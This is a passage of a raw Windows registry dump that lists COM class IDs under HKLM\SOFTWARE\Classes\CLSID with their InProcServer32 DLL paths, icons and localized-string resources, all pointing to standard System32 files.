%SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58C2B4D0-46E7-11D1-89AC-00A0C9054129}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\dmsynth.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58DDEF94-53B5-4BD5-AF79-C4581BBDf7AC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WLanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58E3C745-D971-4081-9034-86E34B30836A} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58E3C745-D971-4081-9034-86E34B30836A}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58E3C745-D971-4081-9034-86E34B30836A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58E3C745-D971-4081-9034-86E34B30836A}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\Speech\SpeechUX\speechuxcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dimsjob.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-123 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{591209c7-767b-42b2-9fba-44ee4615f2c7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59347292-B72D-41F2-98C5-E9ACA1B247A2} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\fxsutility.dll,-4716 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{593817A0-7DB3-11CF-A2DE-00AA00B93356}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ddraw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{593FB605-4854-4965-B5A1-70AB54AB6475}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{594103b8-e428-4461-b8d7-dd0ae12d31d9}\InProcHandler32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{596742A5-1393-4e13-8765-AE1DF71ACAFB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{596AB062-B4D2-4215-9F74-E9109B0A8153} PageTitle REG_EXPAND_SZ @%SystemRoot%\system32\twext.dll,-1024 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{596AB062-B4D2-4215-9F74-E9109B0A8153}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59899957-02f6-44ac-a369-7704e65a1364}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmp4srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{598c2d1b-616c-4782-8cc2-fda9d459be71}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eappcfgui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59A437AB-74F3-4de2-AFE6-54203634C4DD}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntshrui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59B7D16A-C309-47C4-9667-363B9B8D8255}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\spool\tools\PrintBrmPs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59B7DE6C-57AF-11E1-B7A4-EACC4724019B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59B9640B-3F70-4D1C-B159-F26EEB8A4C87}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59BA10A2-E577-488D-BAFA-2D0A3D89D93B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59be4990-f85c-11ce-aff7-00aa003ca9f6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\ntlanui2.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59C88A5A-702B-4DAB-9FBE-F53140BA899B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fhsrchph.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59D95679-9799-458F-8B5B-FE00D8DA0AE4}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\NetTCPIP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59EF44D1-4917-4f05-B10F-48C891E95DCC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\cscui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{59F927B8-B249-4672-88D5-2D688BAFDF24}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5A1826AF-F5A9-4495-88CD-A04A6CF07B2D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5A4ED3BD-2F40-44B4-93DA-2B5ECC197B26} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\Docking.VirtualInput.dll,-101 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5A823D1E-8DDC-44DD-8AB4-F9D32C7FBB05}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\embeddedmodesvcapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5A90DD8E-2A0C-45D1-873A-82B61604CEB2}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5A90DD8E-2A0C-45D1-873A-82B61604CEB2}\Instance\PropertySetStorage Schema REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5A984BF5-D07C-4C99-9E5C-37156F21EE8F}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5AA730D8-0F13-4AD6-B6C6-1EA85218C9A0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfsrcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5acb106d-1a06-4fcd-862d-02a74de81835}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DevPropMgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ADF5BF6-E452-11D1-945A-00C04FB984F9}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5AFFD66E-3C01-4217-BE18-414C155F67B1}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\authui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5B18AB61-091D-11D1-97DF-00C04FB9618A}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtcprx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5b389765-edc1-4adf-9812-1c8a83175892}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5b4dae26-b807-11d0-9815-00c04fd91972}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5b53b2c2-46d6-433e-ab6e-b82efef22b6e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5B681E0D-BD15-4A0E-8B8C-8E90663344E4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5B6D1451-B1E1-4372-90F5-88E541B4DAB9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5b858418-cfb4-4b32-8501-54d8b0c59f90}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5B9084E3-CE4E-4C66-8713-5B02396C090B}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\windows.storage.dll,-51409 System.ItemNameDisplayWithoutExtension REG_EXPAND_SZ @%SystemRoot%\system32\Windows.Storage.dll,-51409 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5BAF654A-5A07-4264-A255-9FF54C7151E7} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\wuapi.dll,-63521 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5BBC2C71-DEC2-4BA3-961A-36F37D1CC8A5}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AUDIOENG.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5bbd58bb-993e-4c17-8af6-3af8e908fca8} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\ieframe.dll,-42000 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5BD3EA21-163B-4B17-951E-E73EEBF0601A}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\RotMgr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5BE4911E-3D99-4546-898D-7EE70201C519}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5BF01503-42BD-41CA-9F75-A465F07A6B11}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5BFF4E02-D379-4050-A382-C6504A980D46}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\powercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C0786ED-1847-11D2-ABA2-00C04FB6C6FA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C0786EE-1847-11D2-ABA2-00C04FB6C6FA}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wsecedit.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C0D19E4-A364-4ef6-9288-DBD194593879}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DeviceCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C24B264-3A01-475C-8EE8-ED4B9DC4F86C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5c2dc96f-8d51-434b-b33c-379bccae77c3}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\azroles.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C5C1935-0235-4434-80BC-251BC1EC39C6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C63C1AD-3956-4FF8-8486-40034758315B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\hnetcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C659257-E236-11D2-8899-00104B2AFB46}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemcntl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C659258-E236-11D2-8899-00104B2AFB46}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\wbem\wbemcntl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5c70bc6a-4ab5-48ee-bce3-e6dd857cbdc6}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C9EA9AA-5541-49C5-97C4-781B1E720F5C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5cd80a0d-5627-49ff-ad53-c8b1791c85f6}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ttlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5D08B586-343A-11D0-AD46-00C04FD8FDFF}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wbemess.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5d1026ee-3f2e-4ccb-a83d-cefb7ac22a71}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\sharemediacpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5D429AF6-D20F-4363-B378-C4AA2FA685EE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5d4d54b3-9fb4-4662-8173-c48568d5e79e}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5D6179C8-17EC-11D1-9AA9-00C04FD8FE93}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\localsec.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5D6179D2-17EC-11D1-9AA9-00C04FD8FE93}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\localsec.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5D75245F-29AE-450D-8924-A7611DE279AF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5d8d315e-8adc-48e5-80ed-7ccf370c971f}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\raschapext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5D9DD151-65F4-11CE-900D-00AA00445589}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\msdtcprx.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5da8fe1f-f485-4516-be06-426b0dddf555}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E032150-8C1E-4c9e-BC60-36E9BFFCFF56}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E33D52F-2EE2-48EE-80FC-543DFF43E326}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\igdDiag.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E6AB780-7743-11CF-A12B-00AA004AE837}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ea4f148-308c-46d7-98a9-49041b1dd468} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\mblctr.exe,-1003 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\mblctr.exe,-1002 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ea4f148-308c-46d7-98a9-49041b1dd468}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\mblctr.exe,0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ea4f148-308c-46d7-98a9-49041b1dd468}\Shell\Open\Command (Default) REG_EXPAND_SZ %SystemRoot%\system32\mblctr.exe /open HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ead82c2-28f1-4f7f-956d-d37420b5a687}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WwanConn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ED4F38C-D3FF-4D61-B506-6820320AEBFE} InfoTip REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-32540 LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-32539 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ED4F38C-D3FF-4D61-B506-6820320AEBFE}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\imageres.dll,-27 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ED4F38C-D3FF-4D61-B506-6820320AEBFE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ed5ada6-d9c5-4645-afec-6b68e54dcf32}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DdcComImplementationsDesktop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ef4af3a-f726-11d0-b8a2-00c04fc309a4}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,-33 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5ef4af3a-f726-11d0-b8a2-00c04fc309a4}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5F02227D-BF38-48BE-B01A-A47D3006DFA2}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\dxp.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5F35421F-3313-4AD6-A3D9-DC4CD7DB4BED}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DeviceSetupManagerAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5F5295E0-429F-1069-A2E2-08002B30309D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5F681803-2900-4C43-A1CC-CF405404A676}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\mstscax.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5F884992-EE6D-418B-9E6C-0C2A0FA94D17}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\DeviceCenter.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5FB7EF7D-DFF4-468a-B6B7-2FCBD188F994}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6004c347-d3f3-472a-8f9e-319b5c583d55}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{600e7adb-da3e-41a4-9225-3c0399e88c0c}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\cngcredui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6011C1F5-A2E0-491A-83CD-D4C5CBA72B73\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\CspLte.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6011C1F5-A2E0-491A-83CD-D4C5CBA72B73}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\CspLte.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60173D16-A550-47f0-A14B-C6F9E4DA0831} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\shell32.dll,-50181 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60173D16-A550-47f0-A14B-C6F9E4DA0831}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3800-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60632754-c523-4b62-b45c-4172da012619} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\usercpl.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\usercpl.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60632754-c523-4b62-b45c-4172da012619}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\usercpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60632754-c523-4b62-b45c-4172da012619}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60632754-c523-4b62-b45c-4172da012619}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\usercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60664caf-af0d-0005-a300-5c7d25ff22a0}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shgina.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{606B3777-3051-401F-974A-E66ACA82A3A3}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\scavengeui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60ABC2F2-6305-4E03-8645-5F9BA071954B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60b78e88-ead8-445c-9cfd-0b87f74ea6cd}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\credprovs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60F6E464-4DEF-11d2-B2D9-00C04F8EEC8C}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL,-2002 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60F6E464-4DEF-11d2-B2D9-00C04F8EEC8C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60F6E465-4DEF-11d2-B2D9-00C04F8EEC8C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60F6E466-4DEF-11d2-B2D9-00C04F8EEC8C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60F6E467-4DEF-11d2-B2D9-00C04F8EEC8C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\DATACLEN.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60F9F51E-4613-4b35-AE88-332542B567B8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmp4srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{60fd46de-f830-4894-a628-6fa81bc0190d}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\photowiz.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6101F767-998E-452B-B54A-E836DD486BAD}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\SensorsClassExtension.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{614C2902-8C8F-4D8F-90A2-FB9017B19FF9}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fhcfg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6150FC78-21A1-46A4-BF3F-897090C6D79D}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\FlightSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{61625667-893E-4707-B925-A82B528C00B8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{61667EE4-8071-46E2-9016-3DB2D7BE9E28}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{61A48126-EF74-4D4A-9DDA-43FD542CAD1E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\MSWB7.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{61BCD1B9-340C-40EC-9D41-D7F1C0632F05}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\edptask.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62079164-233b-41f8-a80f-f01705f514a8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\evr.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6208889B-F7A7-44B4-A34E-3C40E83281DB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{620E38AE-D62C-486B-8339-3DF3C04D88C3}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mfmp4srcsnk.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62112AA1-EBE4-11cf-A5FB-0020AFE7292D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{622A8646-1096-4765-8E07-91A3E661CEF9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\xwizards.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62323107-AD7E-49D1-9223-7ADD7C922D1B}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\rasgcw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62547D24-2ACA-4A33-8F15-AE95CE1A45BD}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{626C80C1-D410-4DE4-9E82-1B4B9610C404}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Common\sapi_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{62907C17-0036-4D44-B59C-70F2621A3EE4}\InprocServer32 (Default) REG_EXPAND_SZ 